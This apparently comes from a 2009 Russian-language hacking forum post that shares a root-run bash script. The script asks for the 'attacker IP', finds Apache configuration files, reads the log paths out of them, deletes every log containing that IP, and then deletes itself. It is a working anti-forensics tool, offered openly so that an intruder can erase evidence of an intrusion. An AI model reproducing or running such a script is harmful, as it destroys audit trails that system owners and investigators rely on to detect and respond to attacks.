25.07.2009, 01:38
|
|
Познающий
Регистрация: 29.03.2009
Сообщений: 87
Провел на форуме:
2185909
Репутация:
308
|
|
Cкрипт, который находит и удаляет лог файлы
Код:
#!/usr/local/bin/bash
### coded by t4z3v4r3d
### recurse function : i m not sure who has write that .So thanks unknown man
### made for FreeBSD First ....
if [ "`id -u`" != "0" ];then
echo "$0 cant run as $USER Please Give me the root perms!!!!! "
exit 1
fi
patern=$2
fl=/tmp/f.txt
fd=/tmp/find.txt
length=/tmp/l-f.txt
log_f=/tmp/log_f.txt
log_final=/tmp/final_log.txt
null=/dev/null
log_path=/tmp/log_Found_.txt
tm="`date | cut -d ":" -f 1`"
os=$OSTYPE
# you can add all paths for all os type !M$ windows IS NOT OS ....Exactly!
case $os in
Linux*) path=/etc/
;;
linux*) path=/etc/
;;
freebsd*) path=/usr/local/
;;
*) path=/
;;
esac
rm $fl
touch $fl
rm $fd
touch $fd
rm $log_f
touch $log_f
rm $log_final
touch $log_final
rm $log_path
touch $log_path
clear
echo "Enter attacker IP"
read -e ip
if [ "`find $path -name apache >> $fl`" ];then
echo -e "\033[3;2f Main path Found ....\033[0;0m"
else
if [ "`find $path -name apache2 >> $fl`" ];then
echo "Founded Apache2 Config files"
fi
fi
recurse () {
for file in $(/bin/ls $1)
do fqfn=$1/$file
[[ -d $fqfn ]] && recurse $fqfn
[[ ${#file} -gt $len ]] && { len=${#file} name=$fqfn; }
[[ -f $fqfn ]] && recurse $fqfn
[[ ${#file} -gt $len ]] && { len=${#file} name=$fqfn; }
#########################################################
if [ -f $1 ];then
let "f=f+1"
if [ "`ls $1 | grep -F .conf`" ];then
let "t=t+1"
cat $1 | grep -F .log | grep -v "#" | cut -d " " -f 2 >> $log_path
nom[$t]="`cat $1 | grep -F .log | grep -v "#" | wc -l`"
echo -e "reading $1\n `cat $1 | grep -F .log | grep -v "#"`" >> /tmp/r.txt
let "nt=nt+${nom[$t]}"
let "j=$nt+$t"
fi
fi
################################################################################
### MOnitoring all acts
################################################################################
echo -e "\033[3;1f\033[1;39m+\033[1;37m======================================\033[1;39m+\033[0;0m"
echo -e "\033[1;39m|\033[1;31m Scanned Files :\033[4;25f \033[1;37m$f\033[1;39m\033[4;40f|\033[0;0m"
echo -e "\033[1;39m|\033[1;31m Path(s) found :\033[5;25f \033[1;37m$l\033[1;39m\033[5;40f|\033[0;0m"
echo -e "\033[1;39m|\033[1;31m pattern found :\033[6;25f \033[1;37m$t\033[1;39m\033[6;40f|\033[0;0m"
echo -e "\033[1;39m|\033[1;31m pattern total :\033[7;25f \033[1;37m$j\033[1;39m\033[7;40f|\033[0;0m"
echo -e "\033[1;39m|\033[1;30m\033[8;2f Scanning `dirname ${1}`::: \033[1;39m\033[8;40f|\033[0;0m"
echo -e "\033[9;1f\033[1;39m+\033[1;37m======================================\033[1;39m+\033[0;0m"
##############################################################################
done ; }
reader(){
cat $fl | while read line ;do
if [ "`ls $line | grep .conf`" != "" ];then
recurse $line
fi
let "l=l+1"
done
}
reader
log_path_reader(){
cat $log_path | while read line ;do
if [ -f $line ];then
if [ "`cat $line | grep "$ip"`" != "" ];then
echo -en "\033[1;30mFounded[\033[1;31m"`cat $line | grep -c "$ip"`" \033[1;30m] $ip in "
echo -n "Removing $line"
rm $line
if [ ! -f $line ];then
echo -e "\033[1;39m ... Done !\033[0;0m"
else
echo -e "\033[1;31m ...Failed!\033[1;0m"
fi
fi
else
echo -e "\033[1;30mFile [\033[1;31m"$line " \033[1;39mFile Dose not exist......\033[1;30m]"
fi
let "l2=l2+1"
done
}
echo -e "\033[8;3f\033[1;31mpath= $path OS= $os\033[0;0m"
echo -e "\033[11;1f\033[1;30mScanning DONE!! NOW : Removing Log Files \033[0;0m"
log_path_reader
echo -en "\033[1;30mRemoving $0 "
rm $fl $log_path $0
if [ ! -f $0 ];then
echo -e "\033[1;39m ... Done !\033[0;0m"
else
echo -e "\033[1;31m ...Failed!\033[1;0m"
fi
echo -e "\033[1;37m Mail: amiri@abysssec.com\033[0;0m"
|
|
|